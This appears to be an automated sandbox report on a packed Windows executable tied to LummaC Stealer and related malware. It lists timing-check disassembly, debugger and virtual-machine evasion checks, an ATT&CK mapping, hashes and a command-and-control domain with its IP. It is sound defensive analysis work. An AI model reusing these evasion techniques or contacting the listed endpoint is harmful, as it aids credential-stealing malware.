Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC128 second address: 5AC138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F5955614996h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC138 second address: 5AC13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B056B second address: 5B056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B056F second address: 5B0573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4974 second address: 4B4980 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007F5955614996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA56B second address: 5BA571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA571 second address: 5BA575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC8DD second address: 5BC8FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F5954CE94B9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC8FC second address: 5BC928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F595561499Eh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F595561499Ch 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edx 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE6B4 second address: 5CE6B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE6B9 second address: 5CE6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE809 second address: 5CE823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5954CE94A6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c jno 00007F5954CE94A6h 0x00000012 pop esi 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE823 second address: 5CE82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E453C second address: 5E456F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5954CE94AAh 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5954CE94B6h 0x00000015 push esi 0x00000016 jng 00007F5954CE94A6h 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E456F second address: 5E4574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E346C second address: 5E3470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E386C second address: 5E3871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E39A0 second address: 5E39BB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jo 00007F5954CE94A6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E39BB second address: 5E39ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5955614996h 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007F5955614996h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F595561499Ch 0x00000019 popad 0x0000001a popad 0x0000001b ja 00007F59556149B6h 0x00000021 pushad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E39ED second address: 5E39F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3DFC second address: 5E3E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3E00 second address: 5E3E33 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007F5954CE94B8h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ecx 0x00000016 push ecx 0x00000017 push esi 0x00000018 pop esi 0x00000019 jc 00007F5954CE94A6h 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3E33 second address: 5E3E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F595561499Ah 0x00000009 jmp 00007F595561499Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3E4E second address: 5E3E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5954CE94B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3E6B second address: 5E3E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4220 second address: 5E422A instructions: 0x00000000 rdtsc 0x00000002 je 00007F5954CE94A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E422A second address: 5E4233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4233 second address: 5E4239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5FEA second address: 5E5FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5FF2 second address: 5E6018 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B5h 0x00000007 ja 00007F5954CE94A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6018 second address: 5E603B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F59556149B6h 0x0000000d jmp 00007F595561499Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F5955614996h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E603B second address: 5E603F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E38 second address: 5E5E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E3C second address: 5E5E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E40 second address: 5E5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E48 second address: 5E5E4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E4D second address: 5E5E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F595561499Eh 0x00000011 jmp 00007F59556149A5h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5E7F second address: 5E5E89 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5954CE94ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F49 second address: 5E8F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F56 second address: 5E8F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F5B second address: 5E8F9A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5955614998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dx, cx 0x0000000e push dword ptr [ebp+122D21A4h] 0x00000014 mov dword ptr [ebp+122D31A5h], ecx 0x0000001a mov edx, eax 0x0000001c push 3F71B4CEh 0x00000021 pushad 0x00000022 pushad 0x00000023 jmp 00007F59556149A4h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA28F second address: 5EA2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94ADh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2A7 second address: 5EA2B1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2B1 second address: 5EA2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2B7 second address: 5EA2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F595561499Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2CA second address: 5EA2CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 34CBED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 34CCA5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 51C536 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 58143A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 1292 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5648 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1496527747.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496527747.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032DF70 LdrInitializeThunk,0_2_0032DF70
Source: file.exe, file.exe, 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (techniques matched by this sample, grouped by tactic; the number in parentheses is the count shown by the report for that technique)

  • Execution: Windows Management Instrumentation (1), Command and Scripting Interpreter (2)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: DLL Side-Loading (1), Process Injection (1)
  • Defense Evasion: Virtualization/Sandbox Evasion (24), Software Packing (12), Obfuscated Files or Information (3), Process Injection (1), DLL Side-Loading (1)
  • Discovery: Security Software Discovery (631), System Information Discovery (223), Virtualization/Sandbox Evasion (24), Process Discovery (2)
  • Collection: Archive Collected Data (1)
  • Command and Control: Application Layer Protocol (13), Encrypted Channel (11), Non-Application Layer Protocol (2)

No techniques were matched under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
Source | Detection | Scanner | Label
https://property-imper.sbs/apiC | 0% | Avira URL Cloud | safe
https://property-imper.sbs/apiM | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
property-imper.sbs | 104.21.33.116 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://property-imper.sbs/api | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://property-imper.sbs/apiC | file.exe, 00000000.00000002.1496527747.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://property-imper.sbs/ | file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/apiM | file.exe, 00000000.00000003.1495632957.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.33.116 | property-imper.sbs | United States | 13335 | CLOUDFLARENETUS | false
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1561923
        Start date and time:2024-11-24 20:00:13 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 2m 47s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:2
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:file.exe
        Detection:MAL
        Classification:mal100.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Stop behavior analysis, all processes terminated
        • Exclude process from analysis (whitelisted): dllhost.exe
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: file.exe
Time | Type | Description
14:01:20 | API Interceptor | 2x Sleep call for process: file.exe modified
Match: 104.21.33.116
Associated Sample Name / URL | Detection | Threat Name
file.exe | malicious | Unknown
file.exe | malicious | Unknown
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
file.exe | malicious | LummaC Stealer
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
file.exe | malicious | LummaC Stealer
file.exe | malicious | Unknown
file.exe | malicious | LummaC Stealer
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
Match: property-imper.sbs
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Unknown | 104.21.33.116
file.exe | malicious | Unknown | 172.67.162.84
file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 172.67.162.84
file.exe | malicious | Unknown | 104.21.33.116
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.33.116
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.33.116
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
file.exe | malicious | Unknown | 104.21.33.116
https://og.oomaal.in/ | malicious | Unknown | 172.67.183.206
file.exe | malicious | Unknown | 172.67.162.84
file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 172.67.162.84
file.exe | malicious | Unknown | 104.21.33.116
PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.67.152
Outstanding Invoices_pdf.vbs | malicious | Remcos, GuLoader | 172.67.191.199
file.exe | malicious | LummaC Stealer | 172.67.162.84
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Unknown | 104.21.33.116
file.exe | malicious | Unknown | 104.21.33.116
file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 104.21.33.116
file.exe | malicious | Unknown | 104.21.33.116
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.33.116
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | Unknown | 104.21.33.116
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948952694520564
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'878'528 bytes
                            MD5:542cd6ef81cdd42518ba3baf58eb90e6
                            SHA1:b8ddd7bd3eae36806335a2c215863853c6c424f4
                            SHA256:23f4575b36961a3121fbec04b3e803e020e9dea411cce529a02e6eb658cc0f60
                            SHA512:de86a4bfac2f16dbe2438ad602f78ab7e852371ea60f7aff10aec8a970826286ce7b45d5c7584c7b7321ef7cf26c5c3aa13c23ff77191980be6f01d9e3b3af7d
                            SSDEEP:49152:7cf+g1IYS6iCnhLt6qx1Ol4fs/ZJuzvfNGE:743RQghLsqx1ATBQzH0
                            TLSH:E295335F9072B5F5E09DBB3243BB0F12777058C5C9150530187BA22E26EAEFC65A4A8F
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................J...........@...........................J...........@.................................\...p..
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x8a9000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x56000 | 0x26200 | f6ff05c6d85820ff488579a0b1c78636 | False | 0.999327612704918 | DOS executable (COM) | 7.982670548763517 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x2b0 | 0x200 | bcc8dbd8db92e4c82287c0d20e6869c4 | False | 0.794921875 | data | 6.061190813406316 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x59000 | 0x2ae000 | 0x200 | abd319d9e752978811803a03d6bb8602 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
